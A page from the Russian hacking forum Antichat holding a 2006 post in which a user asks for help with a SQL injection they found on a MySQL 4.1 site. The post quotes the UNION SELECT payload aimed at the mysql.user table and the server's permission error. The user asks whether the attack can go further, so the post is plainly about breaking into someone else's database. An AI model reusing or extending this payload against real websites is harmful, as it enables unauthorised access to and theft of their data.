Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Sql-inj MySQL Проблемы с запросом. |

10.09.2006, 22:26
|
|
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме: 140396
Репутация:
5
|
|
Sql-inj MySQL Проблемы с запросом.
Всем доброго(ой) вечера\ночи!
Уважаемые!
Подсабите хорошим словом =)
Наткунлся на SQL-инъекцию (MYSQL - 4.1.20-standard).
Код HTML:
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8,9+from+mysql.user+where+id=1/*
пишет...
SELECT command denied to user '........'@'localhost' for table 'user' SQL query : select cityID, fd_type, fd_title, fd_number, art_title, date, art_url, html, pdf from mytable_press WHERE id = -1 union select 1,2,user(),null,database(),null,7,8,9 from mysql.user where id=1/* ORDER BY date DESC;
SELECT command denied to user '........'@'localhost' - Конец истории? или есть продолжение.
Подскажите пожалуйста.
С уважением.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|